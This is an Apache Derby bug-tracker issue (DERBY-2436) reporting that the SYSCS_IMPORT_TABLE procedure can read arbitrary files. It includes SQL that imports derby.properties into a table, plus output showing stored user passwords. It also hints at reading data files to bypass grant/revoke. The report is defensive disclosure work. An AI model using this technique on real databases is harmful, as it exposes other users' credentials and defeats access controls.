Uploaded image for project: 'Derby'
  1. Derby
  2. DERBY-2436

SYSCS_IMPORT_TABLE can be used to read derby files

    XMLWordPrintableJSON

Details

    • Normal
    • Regression, Security

    Description

      There are no controls over which files SYSCS_IMPORT_TABLE can read, thus allowing any user that has permission to execute the procedure to try and access information that they have no permissions to do so. E.g. even with the secure-by-default network server I can execute three lines of SQL to view to contents of derby.properties, thus seeing passwords of other users, or the address of the ldap server.

      create table t (c varchar(32000));
      CALL SYSCS_UTIL.SYSCS_IMPORT_TABLE(NULL, 'T', 'derby.properties', NULL, NULL, 'ISO8859_1', 0);

      ij> select * from T;
      C

      ----------------------------------------------
      derby.connection.requireAuthentication=true
      derby.authentication.provider=BUILTIN
      derby.user.SA=sapwd
      derby.user.MARY=marypwd

      Also a similar trick could be attempted against the actual data files, allowing a user to attempt to bypass grant/revoke security, especially no that binary data can be exported/imported.

      Attachments

        Issue Links

          relates to

          Bug - A problem which impairs or prevents the functions of the product. DERBY-2437 SYSCS_EXPORT_TABLE can be used to overwrite derby files

          • Critical - Crashes, loss of data, severe memory leak.
          • Closed

          Activity

            People

              Unassigned Unassigned
              djd Daniel John Debrunner
              Votes:
              1 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

                Created:
                Updated: